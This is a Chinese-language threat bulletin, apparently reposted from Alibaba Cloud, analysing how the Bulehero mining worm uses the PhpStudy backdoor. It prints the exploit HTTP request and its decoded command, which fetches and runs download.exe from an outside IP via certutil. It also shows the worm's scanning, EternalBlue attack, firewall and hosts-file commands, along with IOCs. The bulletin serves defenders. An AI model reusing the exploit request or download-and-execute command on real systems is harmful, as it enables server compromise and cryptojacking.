威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
发表于:2025-01-24 作者:千家信息网编辑
千家信息网最后更新 2025年01月24日,概述近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进
千家信息网最后更新 2025年01月24日威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
如上图是恶意文件在主机中的行为流程图,download.exe是Bulehero的下载器,会下载名为ScarupnpLogon.exe 的文件。该文件会释放多个打包的恶意文件,这些恶意文件可分为三个模块:挖矿模块、扫描模块、攻击模块。
原文链接 本文为云栖社区原创内容,未经允许不得转载。
概述
近日,阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级,蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击,攻击成功后会下载门罗币挖矿程序进行牟利。 该挖矿程序会大肆抢占服务器CPU资源进行门罗币的挖掘,造成服务器卡顿,严重影响正常业务运行,甚至造成业务终端。关于该蠕虫最早曝光于2018年7月,蠕虫自出现后频繁更新,陆续加入多达数十种的的攻击方式,可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序。建议用户及时排查自身主机是否存在安全漏洞,并关注阿里云安全团队的相关文章。背景介绍
Bulehero
Bulehero挖矿蠕虫最早出现于2018年初,初次曝光于2018年8月,因最早使用bulehero.in域名被命名为Bulehero。 该蠕虫专注于攻击Windows服务器,通过植入恶意挖矿软件进行牟利。它使用多种复杂的攻击方式进行传播,自出现后更新频繁,不断的将新的攻击方式加入自己的武器库。PhpStudy后门漏洞
PhpStudy是国内的一款免费的PHP调试环境的程序集成包,在国内有着近百万的PHP语言学习者和开发者用户。在2019年9月20日,网上爆出PhpStudy存在"后门":黑客早在2016年就编写了"后门"文件,并非法侵入了PhpStudy的官网,篡改了软件安装包植入"后门"。该"后门"具有远程控制计算机的功能,可以远程控制下载运行脚本实现用户个人信息收集。据报道黑客利用该漏洞共非法控制计算机67万余台,非法获取大量账号密码类、聊天数据类、设备码类等数据10万余组。该"后门"除了会造成挖矿和信息泄露,还有可能被勒索病毒利用,服务器关键数据被勒索病毒加密后将无法找回,给被害者造成大量的数据、经济损失。蠕虫分析
攻击行为分析
攻击者会向被攻击的服务器发送一个利用漏洞的HTTP GET请求,恶意代码存在于请求头的Accept-Charset字段,字段内容经过base64编码。解码后可以发现这是一段windows命令:利用certutil.exe工具下载download.exeGET /index.php HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7Accept-Encoding: gzip,deflateAccept-Language: zh-cnReferer: http://xxx:80/index.phpUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: xxx解码后内容:
system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');
被感染主机行为
如上图是恶意文件在主机中的行为流程图,download.exe是Bulehero的下载器,会下载名为ScarupnpLogon.exe 的文件。该文件会释放多个打包的恶意文件,这些恶意文件可分为三个模块:挖矿模块、扫描模块、攻击模块。
- 挖矿模块:该模块进行门罗币的挖矿,Bulehero在该版本中并未使用公共矿池进行挖矿,改用自建的矿池代理进行挖矿任务分发,因此可以避免暴露钱包地址,防止安全研究人员的跟踪。
- 扫描模块:该模块会扫描互联网的特定开放端口,并将扫描结果写入到名为Result.txt的文件中
C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445
- 攻击模块: 该模块集成多种漏洞利用工具,读取扫描结果并攻击其他主机,如下进程是其使用永恒之蓝漏洞模块进行攻击。
C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll我们对比Bulehero升级前的样本行为,发现它在主机中的行为并未有较大改变,依然是通过download.exe下载器下载文件包,并释放三个功能模块。但是它为了隐藏自身改变了恶意文件命名方式,升级前通过混淆的系统文件名进行伪装,升级后全部为随机的文件路径和文件名。虽然随机文件名相对于混淆系统文件名更容易暴露自己,但这种策略的好处是可以避免被其他挖矿病毒通过进程指纹清除,在资源竞争中占据优势。
- 其他行为 使用netsh ipsec安全工具,阻断存在漏洞的服务端口,防止其他竞争者进入。
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCPnetsh ipsec static add filteraction name=BastardsList action=block修改主机host防止其他竞争者劫持域名。
cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
时间线
我们根据Bulehero的恶意文件编译时间和文件上传时间,可以确定Bulehero的升级时间是在10月6号的23点,距离PhpStudy后门漏洞利用方式曝光只有2周。如果企业存在漏洞,去除中间的国庆长假,真正留给企业的修复之间只有几天。从恶意文件下载次数来看,截止到发稿前已经有1万5千次的下载,可见该蠕虫传播速度极快,造成的破坏性很大。其他攻击方式
除了此次更新增加的PhpStudy后门漏洞,Bulehero还使用多种攻击方式,如下是其他已知的攻击方式。IOCs
60[.]164[.]250[.]170 185[.]147[.]34[.]136 fky[.]dfg45dfg45[.]best uu[.]dfg45dfg45[.]best uu1[.]dfg45dfg45[.]best ox[.]mygoodluck[.]best oo[.]mygoodluck[.]best安全建议
- 企业需要对涉及的漏洞及时修复,否则容易成为挖矿木马的受害者。
- 建议使用阿里云安全的下一代云防火墙产品,其阻断恶意外联、能够配置智能策略的功能,能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明,下载、挖矿、反弹shell这些操作,都需要进行恶意外联;云防火墙的拦截将彻底阻断攻击链。此外,用户还可以通过自定义策略,直接屏蔽恶意网站,达到阻断入侵的目的。此外,云防火墙独有的虚拟补丁功能,能够帮助客户更灵活、更"无感"地阻断攻击。
- 对于有更高定制化要求的用户,可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务,定制适合您的方案,帮助加固系统,预防入侵。入侵事件发生后,也可介入直接协助入侵后的清理、事件溯源等,适合有较高安全需求的用户,或未雇佣安全工程师,但希望保障系统安全的企业。
原文链接 本文为云栖社区原创内容,未经允许不得转载。
攻击
文件
漏洞
恶意
模块
方式
后门
服务
蠕虫
主机
升级
安全
用户
行为
服务器
企业
功能
数据
文件名
时间
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
原动力软件开发
服务器过载或被防火墙屏蔽怎么办
安徽软件开发大概多少钱
易语言远程数据库操作
sql没有启动服务器服务
建立数据库连接出错
数据库稀释是什么意思
服务器ip显示未识别网络
深圳服务器维护
数据库软拷贝
如何传到linux服务器
数据库多条件查询
中国有多少个软件开发公司
组服务器腾讯
大专 信息网络安全监察
已成为网络安全国家战略
一位公司老板做软件开发犯罪
高中生网络安全天才
服务器怎么找管理员
动态数据库是什么
无线网络安全仿真实验结论
网络技术员网站
关系数据库设计的概念
实力强手机软件开发商
天津常规软件开发厂家价格
数据库连接一直转圈
上海北斗校时服务器设置
数据库还原服务器不支持
软件开发快速推广
数据库应用注意事项